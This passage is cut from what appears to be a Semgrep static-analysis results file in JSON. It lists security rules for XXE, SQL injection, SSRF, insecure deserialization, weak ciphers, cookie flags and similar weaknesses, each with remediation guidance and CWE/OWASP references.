[https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks through parameter entities by configuring $FACTORY with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.xmlreader-xxe-parameter-entities.xmlreader-xxe-parameter-entities","id":"java.lang.security.xxe.xmlreader-xxe-parameter-entities.xmlreader-xxe-parameter-entities","name":"java.lang.security.xxe.xmlreader-xxe-parameter-entities.xmlreader-xxe-parameter-entities","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.xmlreader-xxe-parameter-entities.xmlreader-xxe-parameter-entities"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"help":{"markdown":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-httponly-missing.flask-cookie-httponly-missing)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-httponly-missing.flask-cookie-httponly-missing","id":"python.flask.web.flask-cookie-httponly-missing.flask-cookie-httponly-missing","name":"python.flask.web.flask-cookie-httponly-missing.flask-cookie-httponly-missing","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-httponly-missing.flask-cookie-httponly-missing"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"IDEA (International Data Encryption Algorithm) is a block cipher created in 1991. It is an optional component of the OpenPGP standard. This cipher is susceptible to attacks when using weak keys. It is recommended that you do not use this cipher for new applications. Use a strong symmetric cipher such as EAS instead. With the `cryptography` package it is recommended to use `Fernet` which is a secure implementation of AES in CBC mode with a 128-bit key. Alternatively, keep using the `Cipher` class from the hazmat primitives but use the AES algorithm instead."},"help":{"markdown":"IDEA (International Data Encryption Algorithm) is a block cipher created in 1991. It is an optional component of the OpenPGP standard. This cipher is susceptible to attacks when using weak keys. It is recommended that you do not use this cipher for new applications. Use a strong symmetric cipher such as EAS instead. With the `cryptography` package it is recommended to use `Fernet` which is a secure implementation of AES in CBC mode with a 128-bit key. Alternatively, keep using the `Cipher` class from the hazmat primitives but use the AES algorithm instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cryptography.security.insecure-cipher-algorithms.insecure-cipher-algorithm-idea)\n - [https://tools.ietf.org/html/rfc5469](https://tools.ietf.org/html/rfc5469)\n - [https://cryptography.io/en/latest/hazmat/primitives/symmetric-encryption/#cryptography.hazmat.primitives.ciphers.algorithms.IDEA](https://cryptography.io/en/latest/hazmat/primitives/symmetric-encryption/#cryptography.hazmat.primitives.ciphers.algorithms.IDEA)\n","text":"IDEA (International Data Encryption Algorithm) is a block cipher created in 1991. It is an optional component of the OpenPGP standard. This cipher is susceptible to attacks when using weak keys. It is recommended that you do not use this cipher for new applications. Use a strong symmetric cipher such as EAS instead. With the `cryptography` package it is recommended to use `Fernet` which is a secure implementation of AES in CBC mode with a 128-bit key. Alternatively, keep using the `Cipher` class from the hazmat primitives but use the AES algorithm instead."},"helpUri":"https://semgrep.dev/r/python.cryptography.security.insecure-cipher-algorithms.insecure-cipher-algorithm-idea","id":"python.cryptography.security.insecure-cipher-algorithms.insecure-cipher-algorithm-idea","name":"python.cryptography.security.insecure-cipher-algorithms.insecure-cipher-algorithm-idea","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.cryptography.security.insecure-cipher-algorithms.insecure-cipher-algorithm-idea"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"AWS Session Token detected"},"help":{"markdown":"AWS Session Token detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-aws-session-token.detected-aws-session-token)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"AWS Session Token detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-aws-session-token.detected-aws-session-token","id":"generic.secrets.security.detected-aws-session-token.detected-aws-session-token","name":"generic.secrets.security.detected-aws-session-token.detected-aws-session-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-aws-session-token.detected-aws-session-token"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.mysql.mysql-empty-password.mysql-empty-password)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.mysql.mysql-empty-password.mysql-empty-password","id":"go.secrets.mysql.mysql-empty-password.mysql-empty-password","name":"go.secrets.mysql.mysql-empty-password.mysql-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.mysql.mysql-empty-password.mysql-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"This expression points to memory that has been freed. This can lead to a segmentation fault or memory corruption."},"help":{"markdown":"This expression points to memory that has been freed. This can lead to a segmentation fault or memory corruption.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.use-after-free.local-variable-new-delete.local-variable-new-delete)\n - [https://wiki.sei.cmu.edu/confluence/display/c/MEM30-C.+Do+not+access+freed+memory](https://wiki.sei.cmu.edu/confluence/display/c/MEM30-C.+Do+not+access+freed+memory)\n - [https://wiki.sei.cmu.edu/confluence/display/cplusplus/EXP54-CPP.+Do+not+access+an+object+outside+of+its+lifetime](https://wiki.sei.cmu.edu/confluence/display/cplusplus/EXP54-CPP.+Do+not+access+an+object+outside+of+its+lifetime)\n","text":"This expression points to memory that has been freed. This can lead to a segmentation fault or memory corruption."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.use-after-free.local-variable-new-delete.local-variable-new-delete","id":"cpp.lang.security.use-after-free.local-variable-new-delete.local-variable-new-delete","name":"cpp.lang.security.use-after-free.local-variable-new-delete.local-variable-new-delete","properties":{"precision":"very-high","tags":["CWE-416: Use After Free","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.use-after-free.local-variable-new-delete.local-variable-new-delete"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application builds a URL using user-controlled input which can lead to an open redirect vulnerability. An attacker can manipulate the URL and redirect users to an arbitrary domain. Open redirect vulnerabilities can lead to issues such as Cross-site scripting (XSS) or redirecting to a malicious domain for activities such as phishing to capture users' credentials. To prevent this vulnerability perform strict input validation of the domain against an allowlist of approved domains. Notify a user in your application that they are leaving the website. Display a domain where they are redirected to the user. A user can then either accept or deny the redirect to an untrusted site."},"help":{"markdown":"The application builds a URL using user-controlled input which can lead to an open redirect vulnerability. An attacker can manipulate the URL and redirect users to an arbitrary domain. Open redirect vulnerabilities can lead to issues such as Cross-site scripting (XSS) or redirecting to a malicious domain for activities such as phishing to capture users' credentials. To prevent this vulnerability perform strict input validation of the domain against an allowlist of approved domains. Notify a user in your application that they are leaving the website. Display a domain where they are redirected to the user. A user can then either accept or deny the redirect to an untrusted site.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.browser.open-redirect-pathname.open-redirect-pathname)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html)\n","text":"The application builds a URL using user-controlled input which can lead to an open redirect vulnerability. An attacker can manipulate the URL and redirect users to an arbitrary domain. Open redirect vulnerabilities can lead to issues such as Cross-site scripting (XSS) or redirecting to a malicious domain for activities such as phishing to capture users' credentials. To prevent this vulnerability perform strict input validation of the domain against an allowlist of approved domains. Notify a user in your application that they are leaving the website. Display a domain where they are redirected to the user. A user can then either accept or deny the redirect to an untrusted site."},"helpUri":"https://semgrep.dev/r/javascript.browser.open-redirect-pathname.open-redirect-pathname","id":"javascript.browser.open-redirect-pathname.open-redirect-pathname","name":"javascript.browser.open-redirect-pathname.open-redirect-pathname","properties":{"precision":"very-high","tags":["CWE-601: URL Redirection to Untrusted Site ('Open Redirect')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.browser.open-redirect-pathname.open-redirect-pathname"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"`$POLICY` is missing a `condition` block which scopes users of this policy to specific GitHub repositories. Without this, `$POLICY` is open to all users on GitHub. Add a `condition` block on the variable `token.actions.githubusercontent.com:sub` which scopes it to prevent this."},"help":{"markdown":"`$POLICY` is missing a `condition` block which scopes users of this policy to specific GitHub repositories. Without this, `$POLICY` is open to all users on GitHub. Add a `condition` block on the variable `token.actions.githubusercontent.com:sub` which scopes it to prevent this.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.unrestricted-github-oidc-policy.unrestricted-github-oidc-policy)\n - [https://docs.github.com/en/actions/deployment/security-hardening-your-deployments/configuring-openid-connect-in-amazon-web-services#configuring-the-role-and-trust-policy](https://docs.github.com/en/actions/deployment/security-hardening-your-deployments/configuring-openid-connect-in-amazon-web-services#configuring-the-role-and-trust-policy)\n - [https://dagrz.com/writing/aws-security/hacking-github-aws-oidc/](https://dagrz.com/writing/aws-security/hacking-github-aws-oidc/)\n","text":"`$POLICY` is missing a `condition` block which scopes users of this policy to specific GitHub repositories. Without this, `$POLICY` is open to all users on GitHub. Add a `condition` block on the variable `token.actions.githubusercontent.com:sub` which scopes it to prevent this."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.unrestricted-github-oidc-policy.unrestricted-github-oidc-policy","id":"terraform.aws.security.unrestricted-github-oidc-policy.unrestricted-github-oidc-policy","name":"terraform.aws.security.unrestricted-github-oidc-policy.unrestricted-github-oidc-policy","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.unrestricted-github-oidc-policy.unrestricted-github-oidc-policy"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries."},"help":{"markdown":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.aws-lambda.security.tainted-sql-string.tainted-sql-string)\n - [https://owasp.org/www-community/attacks/SQL_Injection](https://owasp.org/www-community/attacks/SQL_Injection)\n","text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries."},"helpUri":"https://semgrep.dev/r/java.aws-lambda.security.tainted-sql-string.tainted-sql-string","id":"java.aws-lambda.security.tainted-sql-string.tainted-sql-string","name":"java.aws-lambda.security.tainted-sql-string.tainted-sql-string","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.aws-lambda.security.tainted-sql-string.tainted-sql-string"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The application is running debug code or has debug mode enabled. This may expose sensitive information, like stack traces and environment variables, to attackers. It may also modify application behavior, potentially enabling attackers to bypass restrictions. To remediate this finding, ensure that the application's debug code and debug mode are disabled or removed from the production environment."},"help":{"markdown":"The application is running debug code or has debug mode enabled. This may expose sensitive information, like stack traces and environment variables, to attackers. It may also modify application behavior, potentially enabling attackers to bypass restrictions. To remediate this finding, ensure that the application's debug code and debug mode are disabled or removed from the production environment.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.debug.debug-flask-passthrough-errors.debug-flask-passthrough-errors)\n - [https://flask.palletsprojects.com/en/3.0.x/debugging/](https://flask.palletsprojects.com/en/3.0.x/debugging/)\n","text":"The application is running debug code or has debug mode enabled. This may expose sensitive information, like stack traces and environment variables, to attackers. It may also modify application behavior, potentially enabling attackers to bypass restrictions. To remediate this finding, ensure that the application's debug code and debug mode are disabled or removed from the production environment."},"helpUri":"https://semgrep.dev/r/python.flask.debug.debug-flask-passthrough-errors.debug-flask-passthrough-errors","id":"python.flask.debug.debug-flask-passthrough-errors.debug-flask-passthrough-errors","name":"python.flask.debug.debug-flask-passthrough-errors.debug-flask-passthrough-errors","properties":{"precision":"very-high","tags":["CWE-489: Active Debug Code","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.debug.debug-flask-passthrough-errors.debug-flask-passthrough-errors"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Avoid using insecure deserialization library, backed by `pickle`, `_pickle`, `cpickle`, `dill`, `shelve`, or `yaml`, which are known to lead to remote code execution vulnerabilities."},"help":{"markdown":"Avoid using insecure deserialization library, backed by `pickle`, `_pickle`, `cpickle`, `dill`, `shelve`, or `yaml`, which are known to lead to remote code execution vulnerabilities.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.audit.avoid-insecure-deserialization.avoid-insecure-deserialization)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n","text":"Avoid using insecure deserialization library, backed by `pickle`, `_pickle`, `cpickle`, `dill`, `shelve`, or `yaml`, which are known to lead to remote code execution vulnerabilities."},"helpUri":"https://semgrep.dev/r/python.django.security.audit.avoid-insecure-deserialization.avoid-insecure-deserialization","id":"python.django.security.audit.avoid-insecure-deserialization.avoid-insecure-deserialization","name":"python.django.security.audit.avoid-insecure-deserialization.avoid-insecure-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.audit.avoid-insecure-deserialization.avoid-insecure-deserialization"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A parameter being passed directly into `url` most likely lead to SSRF. This could allow an attacker to send data to their own server, potentially exposing sensitive data sent with this request. They could also probe internal servers or other resources that the server running this code can access. Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"help":{"markdown":"A parameter being passed directly into `url` most likely lead to SSRF. This could allow an attacker to send data to their own server, potentially exposing sensitive data sent with this request. They could also probe internal servers or other resources that the server running this code can access. Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/scala.lang.security.audit.dispatch-ssrf.dispatch-ssrf)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n - [https://dispatchhttp.org/Dispatch.html](https://dispatchhttp.org/Dispatch.html)\n","text":"A parameter being passed directly into `url` most likely lead to SSRF. This could allow an attacker to send data to their own server, potentially exposing sensitive data sent with this request. They could also probe internal servers or other resources that the server running this code can access. Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"helpUri":"https://semgrep.dev/r/scala.lang.security.audit.dispatch-ssrf.dispatch-ssrf","id":"scala.lang.security.audit.dispatch-ssrf.dispatch-ssrf","name":"scala.lang.security.audit.dispatch-ssrf.dispatch-ssrf","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: scala.lang.security.audit.dispatch-ssrf.dispatch-ssrf"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Functions reliant on pickle can result in arbitrary code execution. Consider loading from `state_dict`, using fickling, or switching to a safer serialization method like ONNX"},"help":{"markdown":"Functions reliant on pickle can result in arbitrary code execution. Consider loading from `state_dict`, using fickling, or switching to a safer serialization method like ONNX\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.python.pickles-in-pytorch.pickles-in-pytorch)\n - [https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/](https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/)\n","text":"Functions reliant on pickle can result in arbitrary code execution. Consider loading from `state_dict`, using fickling, or switching to a safer serialization method like ONNX"},"helpUri":"https://semgrep.dev/r/trailofbits.python.pickles-in-pytorch.pickles-in-pytorch","id":"trailofbits.python.pickles-in-pytorch.pickles-in-pytorch","name":"trailofbits.python.pickles-in-pytorch.pickles-in-pytorch","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.python.pickles-in-pytorch.pickles-in-pytorch"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"multiprocessing.Process.kill() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use terminate()."},"help":{"markdown":"multiprocessing.Process.kill() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use terminate().\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-multiprocess2)\n","text":"multiprocessing.Process.kill() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use terminate()."},"helpUri":"https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-multiprocess2","id":"python.lang.compatibility.python37.python37-compatibility-multiprocess2","name":"python.lang.compatibility.python37.python37-compatibility-multiprocess2","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: python.lang.compatibility.python37.python37-compatibility-multiprocess2"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-ssrf.tainted-ssrf)\n - [https://cwe.mitre.org/data/definitions/918.html](https://cwe.mitre.org/data/definitions/918.html)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/)\n - [https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fauth~2Fssrf~2Fgeneric](https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fauth~2Fssrf~2Fgeneric)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-ssrf.tainted-ssrf","id":"java.servlets.security.tainted-ssrf.tainted-ssrf","name":"java.servlets.security.tainted-ssrf.tainted-ssrf","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-ssrf.tainted-ssrf"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Session key based on user input risks session poisoning. The user can determine the key used for the session, and thus write any session variable. Session variables are typically trusted to be set only by the application, and manipulating the session can result in access control issues."},"help":{"markdown":"Session key based on user input risks session poisoning. The user can determine the key used for the session, and thus write any session variable. Session variables are typically trusted to be set only by the application, and manipulating the session can result in access control issues.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.injection.tainted-session.tainted-session)\n - [https://en.wikipedia.org/wiki/Session_poisoning](https://en.wikipedia.org/wiki/Session_poisoning)\n","text":"Session key based on user input risks session poisoning. The user can determine the key used for the session, and thus write any session variable. Session variables are typically trusted to be set only by the application, and manipulating the session can result in access control issues."},"helpUri":"https://semgrep.dev/r/php.lang.security.injection.tainted-session.tainted-session","id":"php.lang.security.injection.tainted-session.tainted-session","name":"php.lang.security.injection.tainted-session.tainted-session","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.injection.tainted-session.tainted-session"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"help":{"markdown":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.sqli.jdbc-sqli.jdbc-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.sqli.jdbc-sqli.jdbc-sqli","id":"java.lang.security.audit.sqli.jdbc-sqli.jdbc-sqli","name":"java.lang.security.audit.sqli.jdbc-sqli.jdbc-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.sqli.jdbc-sqli.jdbc-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Variable `$X` is likely modified and later used on error. In some cases this could result in panics due to a nil dereference"},"help":{"markdown":"Variable `$X` is likely modified and later used on error. In some cases this could result in panics due to a nil dereference\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.go.invalid-usage-of-modified-variable.invalid-usage-of-modified-variable)\n - [https://blog.trailofbits.com/2019/11/07/attacking-go-vr-ttps/](https://blog.trailofbits.com/2019/11/07/attacking-go-vr-ttps/)\n","text":"Variable `$X` is likely modified and later used on error. In some cases this could result in panics due to a nil dereference"},"helpUri":"https://semgrep.dev/r/trailofbits.go.invalid-usage-of-modified-variable.invalid-usage-of-modified-variable","id":"trailofbits.go.invalid-usage-of-modified-variable.invalid-usage-of-modified-variable","name":"trailofbits.go.invalid-usage-of-modified-variable.invalid-usage-of-modified-variable","properties":{"precision":"very-high","tags":["CWE-665: Improper Initialization","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.go.invalid-usage-of-modified-variable.invalid-usage-of-modified-variable"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The protocol scheme for this proxy is dynamically determined. This can be dangerous if the scheme can be injected by an attacker because it may forcibly alter the connection scheme. Consider hardcoding a scheme for this proxy."},"help":{"markdown":"The protocol scheme for this proxy is dynamically determined. This can be dangerous if the scheme can be injected by an attacker because it may forcibly alter the connection scheme. Consider hardcoding a scheme for this proxy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.dynamic-proxy-scheme.dynamic-proxy-scheme)\n - [https://github.com/yandex/gixy/blob/master/docs/en/plugins/ssrf.md](https://github.com/yandex/gixy/blob/master/docs/en/plugins/ssrf.md)\n","text":"The protocol scheme for this proxy is dynamically determined. This can be dangerous if the scheme can be injected by an attacker because it may forcibly alter the connection scheme. Consider hardcoding a scheme for this 